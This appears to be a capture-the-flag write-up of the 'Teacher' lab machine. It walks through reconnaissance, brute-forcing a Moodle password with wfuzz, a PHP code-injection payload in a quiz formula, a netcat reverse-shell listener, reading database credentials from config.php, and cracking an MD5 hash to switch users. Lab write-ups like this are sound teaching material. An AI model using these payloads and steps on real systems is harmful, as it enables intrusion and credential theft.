Clicking on the highlighted links does nothing at all.
Closely looking at the source, we notice something odd about images/5.png
Looking at it from the console, we can see that every time we click on a link, the message "That's an F" shows up.
Checking the image at http://10.10.10.153/imageswe can see it doesn't follow the naming convention as the other images. Let's download it.
Inspecting the image shows its text
it seems we might be able to login somewhere using the username Giovanni as long as we can figure out the last digit of the password and the login page.
From the output of gobuster, we can see it found /moodle so checking out out shows a page where we can possibly login. We can also notice the user Giovanni Chhatta
Guessing the Password with Burp
Got the POST request and sent ti to Intruder
I used the following payload from seclist: /usr/share/seclists/Fuzzing/special-chars.txt and Burp shows a hit using the #
This can also be done using wfuzz
Now we are going to try to login to the web application as:
# Nmap 7.80 scan initiated Thu Mar 26 22:11:59 2020 as: nmap -sC -sV -p 80 -oA nmap/Teacher 10.10.10.153
Nmap scan report for 10.10.10.153
Host is up (0.066s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blackhat highschool
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 26 22:12:09 2020 -- 1 IP address (1 host up) scanned in 10.53 seconds
# Download it with wget
wget http://10.10.10.153/images/5.png
# Checking the file
file 5.png
5.png: ASCII text
# Contents
cat 5.png
Hi Servicedesk,
I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.
Could you guys figure out what the last charachter is, or just reset it?
Thanks,
Giovanni
wfuzz -L --hh 27142 -w /usr/share/seclists/Fuzzing/special-chars.txt -d "anchor=&username=giovanni&password=Th4C00lTheachaFUZZ" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" -u http://10.10.10.153/moodle/login/index.php
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.153/moodle/login/index.php
Total requests: 32
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000004: 200 296 L 1258 W 27575 Ch "#"
Total time: 3.765820
Processed Requests: 32
Filtered Requests: 31
Requests/sec.: 8.497483
/*{a*/`$_GET[0]`;//{x}}
rlwrap nc -lnvp 9001
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.153.
Ncat: Connection from 10.10.10.153:33758.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@teacher:/var/www/html/moodle$ cat config.php
cat config.php
<?php // Moodle configuration file
unset($CFG);
global $CFG;
$CFG = new stdClass();
$CFG->dbtype = 'mariadb';
$CFG->dblibrary = 'native';
$CFG->dbhost = 'localhost';
$CFG->dbname = 'moodle';
$CFG->dbuser = 'root';
$CFG->dbpass = 'Welkom1!';
$CFG->prefix = 'mdl_';
$CFG->dboptions = array (
'dbpersist' => 0,
'dbport' => 3306,
'dbsocket' => '',
'dbcollation' => 'utf8mb4_unicode_ci',
);
$CFG->wwwroot = 'http://10.10.10.153/moodle';
$CFG->dataroot = '/var/www/moodledata';
$CFG->admin = 'admin';
$CFG->directorypermissions = 0777;
require_once(__DIR__ . '/lib/setup.php');
// There is no php closing tag in this file,
// it is intentional because it prevents trailing whitespace problems!
MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| moodle |
| mysql |
| performance_schema |
| phpmyadmin |
+--------------------+
5 rows in set (0.00 sec)
MariaDB [(none)]>
Hash Type Result
7a860966115182402ed06375cf0a22af md5 expelled
www-data@teacher:/var/www/html/moodle$ su - giovanni
su - giovanni
Password: expelled
giovanni@teacher:~$ id
id
uid=1000(giovanni) gid=1000(giovanni) groups=1000(giovanni)
giovanni@teacher:~$
giovanni@teacher:~$ find . -ls
find . -ls
1055165 4 drwxr-x--- 4 giovanni giovanni 4096 Nov 4 2018 .
1055175 4 drwxrwxrwx 2 giovanni giovanni 4096 Jun 27 2018 ./.nano
1055166 4 -rw-r--r-- 1 giovanni giovanni 220 Jun 27 2018 ./.bash_logout
1048578 4 -rw------- 1 giovanni giovanni 1 Nov 4 2018 ./.bash_history
1055158 4 -rw-r--r-- 1 giovanni giovanni 33 Jun 27 2018 ./user.txt
1055167 4 -rw-r--r-- 1 giovanni giovanni 3526 Jun 27 2018 ./.bashrc
1055168 4 -rw-r--r-- 1 giovanni giovanni 675 Jun 27 2018 ./.profile
1048592 4 drwxr-xr-x 4 giovanni giovanni 4096 Jun 27 2018 ./work
1055164 4 drwxr-xr-x 3 giovanni giovanni 4096 Jun 27 2018 ./work/tmp
1055172 4 drwxrwxrwx 3 root root 4096 Jun 27 2018 ./work/tmp/courses
1055178 4 drwxrwxrwx 2 root root 4096 Jun 27 2018 ./work/tmp/courses/algebra
1048590 4 -rwxrwxrwx 1 giovanni giovanni 109 Jun 27 2018 ./work/tmp/courses/algebra/answersAlgebra
1055171 4 -rwxrwxrwx 1 root root 256 Apr 21 21:22 ./work/tmp/backup_courses.tar.gz
1055163 4 drwxr-xr-x 3 giovanni giovanni 4096 Jun 27 2018 ./work/courses
1055162 4 drwxr-xr-x 2 root root 4096 Jun 27 2018 ./work/courses/algebra
1055169 4 -rw-r--r-- 1 giovanni giovanni 109 Jun 27 2018 ./work/courses/algebra/answersAlgebra
